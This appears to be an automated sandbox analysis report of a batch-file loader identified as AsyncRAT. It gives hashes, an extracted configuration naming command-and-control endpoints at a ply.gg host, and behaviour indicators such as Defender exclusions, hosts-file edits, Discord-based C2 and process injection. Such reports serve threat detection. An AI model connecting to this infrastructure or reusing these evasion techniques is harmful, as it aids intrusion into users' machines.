asyncrat | 52aac553901b56007d9b40870447423fef70802593722eebd3a7326635074aaa

Analysis

max time kernel
104s
max time network
107s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
26-05-2024 14:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4x loader.bat
Size

1.5MB
MD5

5b956910d7d28f6ee2ccb59d4c7b402f
SHA1

e99a814ba0a8824a2bb1625b4e2cb0aa828d26e1
SHA256

52aac553901b56007d9b40870447423fef70802593722eebd3a7326635074aaa
SHA512

1967ce3eb6344695012c1ebb3c78a2a86396c900783907b7f383bb60a40e622ce52af6b813d3cf17686edae560da6d61462fb1d5f7446114ab9a1c9e61e3f635
SSDEEP

24576:f69MXQh3D4FnZFRiMf4lPGj8rDm2Wum/j2EtY5ZYZu9C0AzBVG3e5Ql2jumGP:fwTSh3QG+Y9tNjQ

Score

10^/10

asyncrat default execution rat

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

bit-keeping.gl.at.ply.gg:4444

bit-keeping.gl.at.ply.gg:49417

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exe

flow pid process

34 5024 powershell.exe
36 5024 powershell.exe
39 5024 powershell.exe
41 5024 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

3848 powershell.exe
836 powershell.exe
3100 powershell.exe
4972 powershell.exe
3852 powershell.exe
1524 powershell.exe
5024 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\Windows\System32\drivers\etc\hosts powershell.exe

flow	pid	process
34	5024	powershell.exe
36	5024	powershell.exe
39	5024	powershell.exe
41	5024	powershell.exe

pid	process
3848	powershell.exe
836	powershell.exe
3100	powershell.exe
4972	powershell.exe
3852	powershell.exe
1524	powershell.exe
5024	powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

41 discord.com
40 discord.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

35 ip-api.com

flow	ioc
41	discord.com
40	discord.com

flow	ioc
35	ip-api.com

Drops file in System32 directory 13 IoCs

Processes:

svchost.exesvchost.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\$phantom-RuntimeBroker_startup_487_str	svchost.exe
File created	C:\Windows\system32\SleepStudy\user-not-present-trace-2024-05-26-14-45-07.etl	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\SleepStudy\user-not-present-trace-2024-05-26-14-45-07.etl	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 4972 set thread context of 2292 4972 powershell.exe RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1872 2292 WerFault.exe RegAsm.exe
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

wmic.exe

pid process

3848 wmic.exe

description	pid	process	target process
PID 4972 set thread context of 2292	4972	powershell.exe	RegAsm.exe

pid	pid_target	process	target process
1872	2292	WerFault.exe	RegAsm.exe

pid	process
3848	wmic.exe

Modifies data under HKEY_USERS 42 IoCs

Processes:

svchost.exesvchost.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018C00DDF836BDF"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe

Modifies registry class 26 IoCs

Processes:

svchost.exepowershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133612083303856626"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\PCT = "133596469724034645"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU\ICT = "133596469726222250"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612083298075581"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612083625088178"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PCT = "133612083076157572"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1\LU	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612082930830682"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133612083639931789"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\ShellFeedsUI\V1\LU\PTT = "133612083692275365"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133612083026714787"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133612083963525698"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\HAM\AUI\CortanaUI\V1	svchost.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
836	powershell.exe
836	powershell.exe
3100	powershell.exe
3100	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
3852	powershell.exe
3852	powershell.exe
3852	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
1524	powershell.exe
1524	powershell.exe
1524	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe
4972	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3372 Explorer.EXE

pid	process
3372	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	836	powershell.exe
Token: SeDebugPrivilege	3100	powershell.exe
Token: SeIncreaseQuotaPrivilege	3100	powershell.exe
Token: SeSecurityPrivilege	3100	powershell.exe
Token: SeTakeOwnershipPrivilege	3100	powershell.exe
Token: SeLoadDriverPrivilege	3100	powershell.exe
Token: SeSystemProfilePrivilege	3100	powershell.exe
Token: SeSystemtimePrivilege	3100	powershell.exe
Token: SeProfSingleProcessPrivilege	3100	powershell.exe
Token: SeIncBasePriorityPrivilege	3100	powershell.exe
Token: SeCreatePagefilePrivilege	3100	powershell.exe
Token: SeBackupPrivilege	3100	powershell.exe
Token: SeRestorePrivilege	3100	powershell.exe
Token: SeShutdownPrivilege	3100	powershell.exe
Token: SeDebugPrivilege	3100	powershell.exe
Token: SeSystemEnvironmentPrivilege	3100	powershell.exe
Token: SeRemoteShutdownPrivilege	3100	powershell.exe
Token: SeUndockPrivilege	3100	powershell.exe
Token: SeManageVolumePrivilege	3100	powershell.exe
Token: 33	3100	powershell.exe
Token: 34	3100	powershell.exe
Token: 35	3100	powershell.exe
Token: 36	3100	powershell.exe
Token: SeIncreaseQuotaPrivilege	3100	powershell.exe
Token: SeSecurityPrivilege	3100	powershell.exe
Token: SeTakeOwnershipPrivilege	3100	powershell.exe
Token: SeLoadDriverPrivilege	3100	powershell.exe
Token: SeSystemProfilePrivilege	3100	powershell.exe
Token: SeSystemtimePrivilege	3100	powershell.exe
Token: SeProfSingleProcessPrivilege	3100	powershell.exe
Token: SeIncBasePriorityPrivilege	3100	powershell.exe
Token: SeCreatePagefilePrivilege	3100	powershell.exe
Token: SeBackupPrivilege	3100	powershell.exe
Token: SeRestorePrivilege	3100	powershell.exe
Token: SeShutdownPrivilege	3100	powershell.exe
Token: SeDebugPrivilege	3100	powershell.exe
Token: SeSystemEnvironmentPrivilege	3100	powershell.exe
Token: SeRemoteShutdownPrivilege	3100	powershell.exe
Token: SeUndockPrivilege	3100	powershell.exe
Token: SeManageVolumePrivilege	3100	powershell.exe
Token: 33	3100	powershell.exe
Token: 34	3100	powershell.exe
Token: 35	3100	powershell.exe
Token: 36	3100	powershell.exe
Token: SeIncreaseQuotaPrivilege	3100	powershell.exe
Token: SeSecurityPrivilege	3100	powershell.exe
Token: SeTakeOwnershipPrivilege	3100	powershell.exe
Token: SeLoadDriverPrivilege	3100	powershell.exe
Token: SeSystemProfilePrivilege	3100	powershell.exe
Token: SeSystemtimePrivilege	3100	powershell.exe
Token: SeProfSingleProcessPrivilege	3100	powershell.exe
Token: SeIncBasePriorityPrivilege	3100	powershell.exe
Token: SeCreatePagefilePrivilege	3100	powershell.exe
Token: SeBackupPrivilege	3100	powershell.exe
Token: SeRestorePrivilege	3100	powershell.exe
Token: SeShutdownPrivilege	3100	powershell.exe
Token: SeDebugPrivilege	3100	powershell.exe
Token: SeSystemEnvironmentPrivilege	3100	powershell.exe
Token: SeRemoteShutdownPrivilege	3100	powershell.exe
Token: SeUndockPrivilege	3100	powershell.exe
Token: SeManageVolumePrivilege	3100	powershell.exe
Token: 33	3100	powershell.exe
Token: 34	3100	powershell.exe
Token: 35	3100	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exepowershell.exeWScript.execmd.exenet.exepowershell.exe

description	pid	process	target process
PID 3812 wrote to memory of 4140	3812	cmd.exe	net.exe
PID 3812 wrote to memory of 4140	3812	cmd.exe	net.exe
PID 4140 wrote to memory of 216	4140	net.exe	net1.exe
PID 4140 wrote to memory of 216	4140	net.exe	net1.exe
PID 3812 wrote to memory of 1556	3812	cmd.exe	cmd.exe
PID 3812 wrote to memory of 1556	3812	cmd.exe	cmd.exe
PID 3812 wrote to memory of 836	3812	cmd.exe	powershell.exe
PID 3812 wrote to memory of 836	3812	cmd.exe	powershell.exe
PID 836 wrote to memory of 3100	836	powershell.exe	powershell.exe
PID 836 wrote to memory of 3100	836	powershell.exe	powershell.exe
PID 836 wrote to memory of 4980	836	powershell.exe	WScript.exe
PID 836 wrote to memory of 4980	836	powershell.exe	WScript.exe
PID 4980 wrote to memory of 3200	4980	WScript.exe	cmd.exe
PID 4980 wrote to memory of 3200	4980	WScript.exe	cmd.exe
PID 3200 wrote to memory of 2024	3200	cmd.exe	net.exe
PID 3200 wrote to memory of 2024	3200	cmd.exe	net.exe
PID 2024 wrote to memory of 2820	2024	net.exe	net1.exe
PID 2024 wrote to memory of 2820	2024	net.exe	net1.exe
PID 3200 wrote to memory of 5112	3200	cmd.exe	cmd.exe
PID 3200 wrote to memory of 5112	3200	cmd.exe	cmd.exe
PID 3200 wrote to memory of 4972	3200	cmd.exe	powershell.exe
PID 3200 wrote to memory of 4972	3200	cmd.exe	powershell.exe
PID 4972 wrote to memory of 3372	4972	powershell.exe	Explorer.EXE
PID 4972 wrote to memory of 2360	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 2160	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 2552	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 2352	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 1760	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 3524	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 2328	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 3312	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 2296	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 944	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 1532	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 1920	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 2508	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 1912	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 1320	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 2436	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 1700	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 1296	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 1884	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 2080	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 2276	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 1484	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 892	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 1876	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 1104	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 1276	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 5012	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 1852	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 1060	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 1052	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 4792	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 1036	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 5064	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 1808	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 1216	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 1412	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 792	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 1604	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 1404	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 1992	4972	powershell.exe	svchost.exe
PID 4972 wrote to memory of 2972	4972	powershell.exe	svchost.exe

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
- Drops file in System32 directory
- Modifies registry class
PID:792
- C:\Windows\System32\mousocoreworker.exe
  C:\Windows\System32\mousocoreworker.exe -Embedding
  2⤵
  PID:2004
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
  2⤵
  PID:4484
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  2⤵
  PID:3008
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  2⤵
  PID:1720
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  2⤵
  PID:2372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:892

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:944

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:404

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:1052

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1104

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1216

